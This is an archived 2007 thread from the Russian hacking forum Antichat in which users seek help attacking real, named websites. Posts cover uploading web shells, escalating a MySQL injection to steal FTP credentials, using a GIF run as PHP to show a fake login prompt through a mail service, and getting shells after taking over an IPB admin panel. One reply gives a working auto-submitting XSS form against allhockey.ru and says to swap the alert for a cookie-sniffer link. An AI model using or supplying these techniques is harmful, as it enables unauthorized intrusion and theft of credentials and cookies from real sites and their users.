ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
15.12.2007, 17:04
|
|
Участник форума
Регистрация: 23.07.2007
Сообщений: 100
Провел на форуме:
620976
Репутация:
52
|
|
Спасибо за ответ, реги нет, как в данном случае лучше провести инъекцию? Юзал поиск, но пожохдящей статьи не нашел, нет ни одной универсальной. Просто вот решил освоить, это мой первая найденная руками скуля  |
|
|
15.12.2007, 17:07
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
если не нашёл подходящей статьи значит плохо искал =\
|
|
|
|
15.12.2007, 17:19
|
|
Познающий
Регистрация: 17.06.2007
Сообщений: 39
Провел на форуме:
197892
Репутация:
11
|
|
Закидываю шелл на сайт и мне выдает: Warning: copy(бла_бла_бла/шелл.php) [function.copy]: failed to open stream: Permission denied in бла_бла_бла/function.inc on line 19
Смотрел и не увидел ошыбки. В чем трабл???
И еще вопрос: что можно сделать если есть мускул инъекция???
Я узнал USER(), VERSION(), DATABASE()
Можно ли узнать логин и пароль к ФТП???
|
|
|
|
15.12.2007, 17:46
|
|
Постоянный
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049
Репутация:
705
|
|
Сообщение от DEMIX
Закидываю шелл на сайт и мне выдает: Warning: copy(бла_бла_бла/шелл.php) [function.copy]: failed to open stream: Permission denied in бла_бла_бла/function.inc on line 19
Смотрел и не увидел ошыбки. В чем трабл???
И еще вопрос: что можно сделать если есть мускул инъекция???
Я узнал USER(), VERSION(), DATABASE()
Можно ли узнать логин и пароль к ФТП???
скорее всего у тебя нулевые права, т.е. ты не сможешь залить пока папка бла_бла не будет тебе доступна.
общий синтаксис команды copy
PHP код:
copy (string source, string dest)
источник/приемник. по пробуй прописать полный путь до папки с корня.
Про то что можно сделать имея скуль читай здесь
http://forum.antichat.ru/thread43966.html
|
|
|
|
16.12.2007, 16:57
|
|
Познающий
Регистрация: 03.10.2007
Сообщений: 83
Провел на форуме:
213499
Репутация:
9
|
|
Всем привет!
Вообщем такая штука:
на один мыльный сервис я отправил письмо с "картинкой".gif ,серверу сказал чтобы .gif обрабатывал как php-скрипт. Решил проверить, что получилось
Открываю новое письмо, смотрю - скрипт заработал, НО скрипт работает, если там есть такая строчка:
(я взял один готовый, который использовали для форумов)
PHP код:
Header('HTTP/1.1 401 Unauthorized');
Header('WWW-Authenticate: Basic realm="coastal.ru - login"');
Точнее сказать вышеприведенный код выполняется, появляется соответствующее окно, но я хочу чтобы выполнялись другие действия, которые почему-то не хотят работать. То есть та фишка работает, а другой мой скрипт нет...почему может такое быть, как избавиться от такой проблемы??
С меня куча ++
P.S. вот тема (дубль получился ) - http://forum.antichat.ru/thread55926.html |
|
|
|
16.12.2007, 21:08
|
|
Познающий
Регистрация: 07.06.2007
Сообщений: 48
Провел на форуме:
702836
Репутация:
19
|
|
http://allhockey.ru/ на этом сайте в поле поиск есть xss....
фильтра там помойму вообще нет...кто чем помочь может развить идею?)
|
|
|
|
16.12.2007, 22:25
|
|
Познающий
Регистрация: 07.06.2007
Сообщений: 48
Провел на форуме:
702836
Репутация:
19
|
|
http://www.championat.ru/
http://www.championat.ru/includes/index.tpl
есть запросы в бд....но опять же, как использовать?)
|
|
|
|
17.12.2007, 00:03
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194
Репутация:
1934
|
|
Сообщение от Spoke
http://allhockey.ru/ на этом сайте в поле поиск есть xss....
фильтра там помойму вообще нет...кто чем помочь может развить идею?)
Дай кому-нить ссылку на хтмл следующего содержания:
Код:
<html>
<head>
<title></title>
</head>
<body onload="document.replier.submit();">
<form action="http://allhockey.ru/find/do-search.query-post.page-0.html" name="replier" id="find" method="post">
<input
type="text"
name="query"
value='"><script>alert(1)</script>' />
</form>
</body>
</html>
Он увидит алерт. За место алерта ввсунь ссылку на снифер.
Зы Если на этом сайте куки вообще используются
|
|
|
|
17.12.2007, 01:37
|
|
Познающий
Регистрация: 07.06.2007
Сообщений: 48
Провел на форуме:
702836
Репутация:
19
|
|
Сообщение от AFoST
Дай кому-нить ссылку на хтмл следующего содержания:
Код:
<html>
<head>
<title></title>
</head>
<body onload="document.replier.submit();">
<form action="http://allhockey.ru/find/do-search.query-post.page-0.html" name="replier" id="find" method="post">
<input
type="text"
name="query"
value='"><script>alert(1)</script>' />
</form>
</body>
</html>
Он увидит алерт. За место алерта ввсунь ссылку на снифер.
Зы Если на этом сайте куки вообще используются всё используется, пасиба за линк =)
|
|
|
|
17.12.2007, 09:21
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Такой вопрос. Получаю доступ к админке на форуме ipb, но залить шелл могу через раз.
Отчего это зависит? От настроек сервера или форума? Пытался изменить настройки на форуме, не получилось.
Последний раз редактировалось Ershik; 17.12.2007 в 11:32..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
